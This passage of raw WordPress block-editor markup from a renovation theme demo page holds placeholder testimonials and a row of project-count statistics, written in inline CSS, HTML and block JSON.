class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"310f3dbd-be56-4fc5-b52f-00b541d1d06c\"} -->\n<style type=\"text/css\"> .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-310f3dbd-be56-4fc5-b52f-00b541d1d06c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\"} -->\n<style type=\"text/css\"> .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"960934cc-d8f0-4b4d-9d0a-764129efdfa3\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\"} -->\n<style type=\"text/css\"> .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"bd99dc76-0eae-4a02-b907-7f82fde09603\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"67d4b8a4-6740-44c1-8315-001228127f3b\"} -->\n<style type=\"text/css\"> .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67d4b8a4-6740-44c1-8315-001228127f3b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67d4b8a4-6740-44c1-8315-001228127f3b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 